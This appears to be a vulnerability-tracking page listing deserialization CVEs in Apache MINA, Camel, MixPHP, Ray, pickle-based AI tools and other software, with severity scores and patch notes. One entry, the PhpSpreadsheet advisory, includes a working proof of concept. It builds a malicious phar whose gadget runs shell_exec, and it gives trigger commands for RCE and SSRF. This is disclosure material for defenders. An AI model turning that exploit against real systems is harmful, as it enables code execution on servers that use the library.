Skip to main content

Deserialization

2662 CVEs technique

Monthly

CVE-2026-44500 Cargo MEDIUM PATCH GHSA This Month

Allocation amplification in Zebra network deserializers allows unauthenticated remote peers to force excessive memory preallocation and parsing overhead across multiple message types (headers, blocks, transactions) by exploiting the use of generic transport/block-size ceilings instead of protocol-specific limits. An attacker can trigger 8.8x oversized header allocations, unbounded equihash solution parsing, and inflated Sapling spend vector allocations on inbound peer messages, causing denial of service through cumulative per-connection and multi-peer fan-in effects. CVSS 5.3 (AV:N/AC:L/PR:N/UI:N) indicates network-accessible, unauthenticated exploitation of default configurations; no public exploit identified at time of analysis, but vendor-released patch available in Zebra 4.4.0.

Denial Of Service Deserialization
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44375 NuGet HIGH PATCH GHSA This Week

### Summary Nerdbank.MessagePack contains an uncontrolled stack allocation vulnerability in DateTime decoding. A malicious MessagePack payload can declare an oversized timestamp extension length, causing the reader to allocate an attacker-controlled number of bytes on the stack. This can trigger a `StackOverflowException`, which is not catchable by user code and terminates the process. ### Impact Applications are impacted if they deserialize MessagePack data from untrusted or attacker-controlled sources using Nerdbank.MessagePack and the target type contains a `DateTime` value. A small malicious payload can cause process termination, resulting in a denial of service. This may affect services, APIs, workers, message consumers, or other long-running processes that deserialize untrusted MessagePack input. The issue occurs because DateTime timestamp extension decoding derives `tokenSize` from the attacker-controlled extension length before validating that the timestamp length is one of the legal MessagePack timestamp sizes: 4, 8, or 12 bytes. When the buffer is incomplete, that unvalidated size is propagated to the streaming reader slow path, where it is used in a `stackalloc`. ### Patches The 1.1.62 version contains the fix for this security vulnerability. ### Workarounds If upgrading is not yet possible, avoid deserializing untrusted MessagePack payloads into type graphs that may contain `DateTime` fields or properties. Input byte-size limits alone may not fully mitigate this issue, because the malicious payload can be small while declaring a very large extension length. Possible mitigations include: - Pre-validating MessagePack extension headers before deserialization and rejecting timestamp extensions whose length is not 4, 8, or 12 bytes. - Rejecting or filtering extension type `-1` timestamp values from untrusted input unless they are known to be valid. - Running deserialization of untrusted payloads in an isolated process that can be safely restarted after termination. - Restricting MessagePack deserialization to trusted producers until a patched version is available. ### Resources - CWE-789: Uncontrolled Memory Allocation: https://cwe.mitre.org/data/definitions/789.html - MessagePack timestamp extension specification: https://github.com/msgpack/msgpack/blob/master/spec.md#timestamp-extension-type

Denial Of Service Deserialization
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-42440 Maven HIGH PATCH GHSA This Week

Remote denial of service in Apache OpenNLP versions before 2.5.9 and 3.0.0-M3 allows unauthenticated attackers to crash JVM processes by uploading malicious .bin model files that trigger OutOfMemoryError through unbounded array allocation. Exploitation requires no authentication (AV:N/AC:L/PR:N) and affects any code path deserializing binary model files from untrusted sources. EPSS score of 0.02% (5th percentile) suggests low widespread exploitation risk, and no active exploitation or public POC has been identified at time of analysis. Vendor-released patches are available with default safeguards limiting count fields to 10 million entries.

Denial Of Service Apache Deserialization Apache Opennlp
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-7712 LOW Monitor

Unsafe deserialization in MindsDB pickle.loads function allows authenticated remote attackers to achieve limited information disclosure and integrity compromise via crafted serialized objects. The vulnerability affects MindsDB up to version 26.01, requires valid credentials (PR:L), and has publicly available exploit code; however, the low CVSS score (2.1) and limited scope indicate restricted real-world impact despite network accessibility.

Deserialization
NVD GitHub VulDB
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-7669 PyPI MEDIUM This Month

Unsafe deserialization in SGLang's HuggingFace Transformer Handler allows remote attackers to trigger deserialization attacks via the get_tokenizer function in versions up to 0.5.9, potentially leading to code execution or information disclosure. The vulnerability requires high attack complexity and has not been patched despite early vendor notification.

Python Deserialization
NVD VulDB GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-7647 HIGH This Week

Unauthenticated PHP object injection in Profile Builder Pro for WordPress allows remote attackers to execute arbitrary code by deserializing malicious objects through an unprotected AJAX endpoint. The vulnerability affects all versions through 3.14.5 and stems from unsafe deserialization of attacker-controlled POST data in the wppb_request_users_pins_action_callback() handler, which was registered for both authenticated and unauthenticated users without nonce verification. With CVSS 8.1 and AC:H complexity, exploitation requires chaining with a POP gadget chain, though EPSS data and KEV status are not available to confirm active exploitation.

PHP WordPress Deserialization
NVD VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-7597 PyPI LOW POC PATCH Monitor

Unsafe pickle deserialization in mem0 up to version 1.0.11 allows authenticated remote attackers to execute arbitrary code via manipulation of the faiss.py vector store module. The vulnerability affects the pickle.load/pickle.dump functions used to serialize docstore data, enabling code execution with moderate impact (confidentiality, integrity, availability). Public exploit code is available, and vendor has released a patched version.

Deserialization Mem0
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.1%
CVE-2026-42778 Maven CRITICAL PATCH GHSA Act Now

Remote code execution in Apache MINA 2.1.0-2.1.11 and 2.2.0-2.2.6 allows unauthenticated attackers to execute arbitrary code via unsafe deserialization. The fix for prior CVE-2024-52046 was incomplete-the classname allowlist protecting IoBuffer.getObject() was applied too late, allowing malicious static initializers to execute before filtering. Confirmed actively exploited (CISA KEV). EPSS exploitation probability not provided, but the network-accessible, unauthenticated attack vector (CVSS:3.1/AV:N/AC:L/PR:N/UI:N) combined with KEV status indicates immediate patching is critical for applications calling IoBuffer.getObject().

Apache Deserialization Red Hat
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-42779 Maven CRITICAL PATCH GHSA Act Now

Remote unauthenticated code execution in Apache MINA 2.1.0-2.1.11 and 2.2.0-2.2.6 allows attackers to bypass class allowlist protections via unsafe deserialization. The vulnerability exists because the fix for CVE-2026-41635 was not backported to the 2.1.X and 2.2.X branches, leaving AbstractIoBuffer.resolveClass() susceptible to arbitrary class instantiation when applications call IoBuffer.getObject(). Only applications actively using MINA's deserialization features are affected. EPSS data not available; no KEV listing or public POC identified at time of analysis.

Apache Deserialization RCE Red Hat
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-7584 HIGH PATCH This Week

Unsafe deserialization in Zurich Instruments LabOne Q enables arbitrary code execution when users load malicious experiment files. The import_cls mechanism accepts unvalidated class names from serialized data, allowing attackers to instantiate arbitrary Python classes with controlled constructor arguments. Exploitation requires user interaction to open a crafted file, making this a credible vector for supply chain attacks via shared experiment configurations or support tickets. CVSS 8.4 reflects local attack vector with user interaction requirement. No confirmed active exploitation or public POC at time of analysis.

Python Deserialization RCE
NVD
CVSS 4.0
8.4
EPSS
0.0%
CVE-2026-37552 HIGH This Week

Arbitrary code execution in MixPHP Framework 2.x through 2.2.17 allows local attackers to execute malicious PHP closures via unauthenticated TCP connections to the sync-invoke server. The vulnerability stems from unsafe deserialization of untrusted data on localhost-bound port 127.0.0.1, where Server.php directly passes socket data to Opis\Closure\unserialize() and executes the result without authentication or signature verification. Exploitation requires local network access or SSRF capability against the application server. No public exploit code identified at time of analysis, but the attack mechanism is straightforward for attackers with PHP deserialization knowledge.

PHP Deserialization RCE N A
NVD GitHub VulDB
CVSS 3.1
8.4
EPSS
0.1%
CVE-2026-42472 CRITICAL Act Now

Remote unauthenticated code execution in MixPHP Framework 2.x through 2.2.17 allows attackers to execute arbitrary PHP code by injecting malicious serialized objects into Redis-backed session or cache storage. The framework's RedisHandler directly deserializes untrusted data from Redis using PHP's unserialize() function without validation. CVSS 9.8 with network vector, low complexity, and no privileges required. EPSS and KEV status not provided; SSVC framework marks this as automatable with total technical impact, indicating high exploitability despite no confirmed active exploitation at time of analysis.

Redis Deserialization
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-42473 CRITICAL Act Now

Remote code execution in MixPHP Framework 2.x through 2.2.17 allows unauthenticated network attackers to execute arbitrary code via unsafe deserialization. The FileHandler class processes session and cache data using PHP's unserialize() on filesystem-sourced content without validation, enabling object injection attacks. CVSS 9.8 critical severity with network attack vector and no privileges required. SSVC assessment confirms automatable exploitation with total technical impact. No active exploitation confirmed at time of analysis (not in CISA KEV), but publicly available proof-of-concept exists (GitHub gist reference).

Deserialization
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-42471 HIGH POC This Week

Client-side remote code execution affects MixPHP Framework 2.x through 2.2.17 when sync-invoke clients connect to attacker-controlled servers. The vulnerability enables malicious servers to execute arbitrary code on connecting clients through unsafe deserialization of server responses (CWE-502). EPSS data unavailable, but SSVC indicates no confirmed exploitation and non-automatable attack complexity aligns with CVSS AC:H rating. Primary risk exists in scenarios where MixPHP clients connect to untrusted external services or where server infrastructure could be compromised.

PHP Deserialization
NVD GitHub Exploit-DB VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-41586 Maven CRITICAL GHSA Act Now

Remote code execution in Hyperledger fabric-sdk-java (all versions 1.0.0 through 2.2.26) allows unauthenticated attackers to execute arbitrary commands via malicious serialized Java objects. The deprecated SDK's Channel.java class deserializes untrusted byte arrays without input filtering in readObject() and deSerializeChannel() methods, enabling classic Java gadget chain exploitation. Publicly available exploit code exists (ysoserial toolkit), and exploitation requires only that an application accept Channel serialization data from attacker-controlled sources such as compromised files, external APIs, or injected parameters. EPSS data unavailable; not listed in CISA KEV. Vendor has published GHSA advisory but provides no patch-remediation requires migration to the replacement fabric-gateway SDK.

Deserialization Java
NVD GitHub
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-34084 PHP CRITICAL PATCH GHSA Act Now

The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

PHP Microsoft SSRF Deserialization
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2026-42521 Maven MEDIUM PATCH This Month

Jenkins Matrix Authorization Strategy Plugin 2.0-beta-1 through 3.2.9 (both inclusive) invokes parameterless constructors of classes specified in configuration when deserializing inheritance strategies, without restricting the classes that can be instantiated, allowing attackers with Item/Configure permission to instantiate arbitrary types, which may lead to information disclosure or other impacts depending on the classes available on the classpath.

Jenkins Information Disclosure Deserialization
NVD VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-7317 PHP LOW PATCH Monitor

A vulnerability was found in Grav CMS up to 1.7.49.5/2.0.0-beta.1. Affected by this vulnerability is the function FileCache::doGet of the file system/src/Grav/Framework/Cache/Adapter/FileCache.php of the component Cache Value Handler. The manipulation results in deserialization. The attack may be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made public and could be used. Upgrading to version 2.0.0-beta.2 addresses this issue. The patch is identified as c66dfeb5f. The affected component should be upgraded.

PHP Deserialization
NVD GitHub VulDB
CVSS 4.0
1.3
EPSS
0.1%
CVE-2026-24186 HIGH This Week

Remote code execution in NVIDIA FLARE SDK allows authenticated attackers to execute arbitrary code by sending maliciously crafted FOBS-encoded messages that exploit unsafe deserialization in the FOBS component. The vulnerability affects federated learning deployments where NVIDIA FLARE SDK processes messages from low-privileged authenticated users, enabling complete system compromise with high impact to confidentiality, integrity, and availability. No active exploitation confirmed (not in CISA KEV) and public exploit status unknown at time of analysis.

Nvidia Deserialization RCE
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2025-60889 CRITICAL Act Now

Remote code execution in StellarGroup HPX 1.11.0 allows unauthenticated attackers to execute arbitrary code through insecure deserialization of untrusted input. Publicly available exploit code exists (GitHub Gist POC) with CISA SSVC classifying this as automatable with total technical impact, though EPSS indicates only 2% probability of exploitation in the wild. The CWE-502 vulnerability enables complete system compromise when untrusted data is deserialized under specific deployment conditions not detailed in the description.

Deserialization RCE Hpx
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2025-60887 MEDIUM This Month

Insecure deserialization in Cista v0.15 and below allows remote unauthenticated attackers to leak stack and heap addresses through reference tampering in the cista::raw namespace, potentially defeating ASLR protections. The vulnerability arises from insufficient validation of pointer-like objects during deserialization, enabling attackers to observe deserialized values and extract memory layout information for subsequent exploitation.

Deserialization
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-27172 Maven HIGH PATCH This Week

The ConsulRegistry in the camel-consul component (class org.apache.camel.component.consul.ConsulRegistry and its inner ConsulRegistryUtils.deserialize method) read Java-serialized values from the Consul KV store and passed them to ObjectInputStream.readObject() without configuring an ObjectInputFilter. An attacker who can write to the Consul KV store backing a Camel ConsulRegistry instance could inject a malicious serialized Java object that is deserialized the next time Camel performs a lookup against that registry, leading to arbitrary code execution in the Camel process. The issue mirrors the class of vulnerability already addressed for other Camel components in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747, and was overlooked during the original remediation of those CVEs. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.1.

RCE Java Deserialization Apache Apache Camel
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-33454 Maven CRITICAL PATCH GHSA Act Now

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\") or from(\"pop3://...\")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6.

Microsoft Deserialization Apache Apache Camel
NVD VulDB
CVSS 3.1
9.4
EPSS
0.0%
CVE-2026-40858 Maven HIGH POC PATCH GHSA This Week

The camel-infinispan component's ProtoStream-based remote aggregation repository deserializes data read from a remote Infinispan cache using java.io.ObjectInputStream without applying any ObjectInputFilter. An attacker who can write to the Infinispan cache used by a Camel application can inject a crafted serialized Java object that, when read during normal aggregation repository operations such as get or recover, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2. The JIRA ticket: https://issues.apache.org/jira/browse/CAMEL-23322 refers to the various commits that resolved the issue, and have more details. This issue follows the same class of vulnerability previously addressed in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747.

RCE Java Atlassian Deserialization Apache +1
NVD VulDB GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41409 Maven CRITICAL PATCH GHSA Act Now

Remote unauthenticated attackers can execute arbitrary code in Apache MINA 2.0.0-2.0.27, 2.1.0-2.1.10, and 2.2.0-2.2.5 through unsafe deserialization in AbstractIoBuffer.getObject(). This is an incomplete fix bypass for CVE-2024-52046 where the classname allowlist validation occurs after static initializers execute, enabling attackers to trigger malicious code execution before security controls engage. Apache confirmed the flaw affects applications calling IoBuffer.getObject() and released patches in versions 2.0.28, 2.1.11, and 2.2.6. CVSS 9.8 critical score reflects network-accessible unauthenticated exploitation with complete system compromise potential.

Deserialization Apache Red Hat
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-41635 Maven CRITICAL PATCH GHSA Act Now

Remote code execution in Apache MINA 2.0.0-2.0.27, 2.1.0-2.1.10, and 2.2.0-2.2.5 allows unauthenticated network attackers to execute arbitrary code by exploiting unsafe deserialization in AbstractIoBuffer.resolveClass(). The vulnerability bypasses classname allowlist protections due to incomplete validation of static classes and primitive types. CVSS 9.8 critical severity reflects trivial network-based exploitation requiring no authentication or user interaction. Applications using IoBuffer.getObject() are affected. Vendor-released patches available in versions 2.0.28, 2.1.11, and 2.2.6.

RCE Deserialization Apache Red Hat
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-40860 CRITICAL PATCH Act Now

JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding class in camel-sjms, deserialized the payload of incoming JMS ObjectMessage values via javax.jms.ObjectMessage.getObject() without applying any ObjectInputFilter, class allowlist or class denylist. Because this code path is reached whenever the mapJmsMessage option is enabled (the default) and Camel acts as a JMS consumer, an attacker able to publish a crafted ObjectMessage to a queue or topic consumed by a Camel application could achieve remote code execution when a deserialization gadget chain was present on the classpath. The same handling was reached transitively through camel-sjms2 (whose Sjms2Endpoint extends SjmsEndpoint) and through camel-amqp (whose AMQPJmsBinding extends JmsBinding), and by other JMS-family components built on JmsComponent such as camel-activemq and camel-activemq6. This issue affects Apache Camel: from 3.0.0 before 4.14.7, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.7. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

RCE Deserialization Apache Camel
NVD VulDB
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-40473 Maven HIGH POC PATCH GHSA This Week

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted serialized Java object over the network to the MINA consumer port can trigger arbitrary code execution in the context of the application during readObject(). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.

RCE Java Deserialization Apache Camel
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40048 Maven HIGH PATCH GHSA This Week

The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<keyId>.key` files in the configured key directory using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. The cast to `java.security.KeyPair` is evaluated only after `readObject()` has already returned, so any `readObject()` side effects in the deserialized object run before the type check. An attacker who can write to the key directory used by a Camel application - for example through a path traversal into the directory, misconfigured filesystem permissions on the volume where keys are stored, a compromised key provisioning pipeline, or a symlink attack - can place a crafted serialized Java object that, when deserialized during normal key lifecycle operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.19.0 before 4.20.0, from 4.18.0 before 4.18.2. Users are recommended to upgrade to version 4.20.0, which fixes the issue by replacing java.io.ObjectInputStream-based key and metadata storage with standard PKCS#8 (private key) / X.509 SubjectPublicKeyInfo (public key) Base64 JSON encoding. For users on the 4.18.x LTS releases stream, upgrade to 4.18.2.

RCE Java Apache Deserialization Path Traversal +1
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-41476 HIGH PATCH This Week

Out-of-bounds memory read in Deskflow's clipboard deserialization allows authenticated remote peers to crash the application or potentially leak memory contents. The vulnerability affects versions prior to 1.26.0.138 and stems from insufficient validation of clipboard data structure during network transfer between connected machines. A malicious peer on the shared keyboard/mouse network can exploit this by sending specially crafted clipboard updates. CVSS 7.4 reflects network-based attack with low complexity requiring authenticated peer connection. No public exploit identified at time of analysis, though proof-of-concept code exists (CVSS E:P).

Buffer Overflow Deserialization Suse
NVD GitHub VulDB
CVSS 4.0
7.4
EPSS
0.0%
CVE-2026-41486 PyPI HIGH PATCH GHSA This Week

Remote code execution in Ray Data 2.49.0-2.54.0 allows attackers to execute arbitrary Python code by crafting malicious Parquet files containing Ray tensor extension types. When Ray Data reads these files, it deserializes untrusted metadata using cloudpickle.loads() without validation, triggering code execution during schema parsing before any data is read. The vulnerability requires only that a victim read a crafted Parquet file from any source (cloud storage, HuggingFace datasets, shared filesystems)-no cluster access or authentication needed. This reintroduces a vulnerability class previously fixed in May 2024, making it a regression introduced in July 2025 (PR #54831). Working proof-of-concept exists demonstrating exploitation via HuggingFace datasets following Ray's own documentation. EPSS data not available, not currently in CISA KEV.

Python Code Injection Deserialization RCE
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.1%
CVE-2026-39816 Maven HIGH PATCH GHSA This Week

Apache NiFi TinkerpopClientService allows authenticated high-privilege users to execute arbitrary code without proper permission validation. The service fails to enforce required Execute Code permissions, enabling privilege escalation within the NiFi environment. While CVSS scores this at 7.5 (High), real-world risk requires authenticated high-privilege access (PR:H), significantly limiting the attack surface to compromised admin accounts or malicious insiders. No public exploit code has been identified, and CISA KEV does not list this vulnerability, suggesting no confirmed active exploitation at time of disclosure.

Authentication Bypass Apache Deserialization
NVD
CVSS 4.0
7.5
EPSS
0.0%
CVE-2026-23902 Maven HIGH PATCH GHSA This Week

Tenant authorization bypass in Apache DolphinScheduler versions before 3.4.1 allows authenticated low-privilege users to execute workflows using arbitrary tenant configurations not assigned to their account, exposing high confidentiality and integrity risks. The vulnerability (CWE-863: Incorrect Authorization) enables privilege escalation through tenant context manipulation during workflow execution. Despite a CVSS score of 8.1, EPSS probability is low (0.02%, 4th percentile) with no active exploitation confirmed. Vendor patch is available in version 3.4.1.

Authentication Bypass Deserialization Apache
NVD VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2025-62233 Maven MEDIUM PATCH This Month

Unsafe deserialization in Apache DolphinScheduler RPC module (versions 3.2.0 to 3.3.0) allows authenticated network attackers to achieve remote code execution by injecting malicious class types into StandardRpcRequest messages sent to Master or Worker nodes. The vulnerability requires network access and valid credentials but carries moderate CVSS (6.3) with very low EPSS exploitation probability (0.02%), suggesting limited real-world weaponization despite the dangerous vulnerability class.

Deserialization Apache
NVD VulDB
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-41316 Ruby HIGH PATCH GHSA This Week

Remote code execution in Ruby ERB library via unsafe deserialization allows unauthenticated attackers to execute arbitrary code by exploiting incomplete protection in Marshal.load workflows. While ERB 2.2.0+ added guards to prevent code execution during deserialization in result() and run() methods, the def_module(), def_method(), and def_class() methods remained unprotected, enabling attackers to bypass the @_init safeguard. Exploitation requires high complexity (AV:N/AC:H) as applications must deserialize untrusted Marshal data with ERB loaded. No EPSS or KEV data available; exploitation likelihood depends on prevalence of unsafe Marshal.load patterns in Ruby codebases.

Deserialization RCE Erb
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-33819 CRITICAL PATCH NEWS NO ACTION HOSTED Monitor

Deserialization of untrusted data in Microsoft Bing allows an unauthorized attacker to execute code over a network.

Microsoft Deserialization
NVD
CVSS 3.1
10.0
EPSS
0.3%
CVE-2026-26210 CRITICAL POC PATCH Act Now

KTransformers through 0.5.3 contains an unsafe deserialization vulnerability in the balance_serve backend mode where the scheduler RPC server binds a ZMQ ROUTER socket to all interfaces with no authentication and deserializes incoming messages using pickle.loads() without validation. Attackers can send a crafted pickle payload to the exposed ZMQ socket to execute arbitrary code on the server with the privileges of the ktransformers process.

Deserialization RCE Ktransformers
NVD GitHub
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-25874 CRITICAL Act Now

LeRobot contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload through the SendPolicyInstructions, SendObservations, or GetActions gRPC calls.

Deserialization RCE Lerobot
NVD GitHub
CVSS 4.0
9.3
EPSS
0.1%
CVE-2025-62373 PyPI CRITICAL PATCH GHSA Act Now

Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. Versions 0.0.41 through 0.0.93 have a vulnerability in `LivekitFrameSerializer` - an optional, non-default, undocumented frame serializer class (now deprecated) intended for LiveKit integration. The class's `deserialize()` method uses Python's `pickle.loads()` on data received from WebSocket clients without any validation or sanitization. This means that a malicious WebSocket client can send a crafted pickle payload to execute arbitrary code on the Pipecat server. The vulnerable code resides in `src/pipecat/serializers/livekit.py` (around line 73), where untrusted WebSocket message data is passed directly into `pickle.loads()` for deserialization. If a Pipecat server is configured to use LivekitFrameSerializer and is listening on an external interface (e.g. 0.0.0.0), an attacker on the network (or the internet, if the service is exposed) could achieve remote code execution (RCE) on the server by sending a malicious pickle payload. Version 0.0.94 contains a fix. Users of Pipecat should avoid or replace unsafe deserialization and improve network security configuration. The best mitigation is to stop using the vulnerable LivekitFrameSerializer altogether. Those who require LiveKit functionality should upgrade to the latest Pipecat version and switch to the recommended `LiveKitTransport` or another secure method provided by the framework. Additionally, always follow secure coding practices: never trust client-supplied data, and avoid Python pickle (or similar unsafe deserialization) in network-facing components.

Python Deserialization RCE
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-41134 NuGet HIGH PATCH GHSA This Week

Code injection in Microsoft Kiota versions prior to 1.31.1 allows attackers who control or tamper with OpenAPI descriptions to inject malicious code into generated HTTP client libraries. Exploitation requires developers to generate clients from untrusted or compromised OpenAPI specifications, then compile and execute the poisoned code. The attack chain culminates in arbitrary code execution within the context of applications using the tainted generated clients. CVSS 7.3 with local attack vector and user interaction required suggests lower immediate urgency, though EPSS data is unavailable. No public exploit code or active exploitation confirmed at time of analysis.

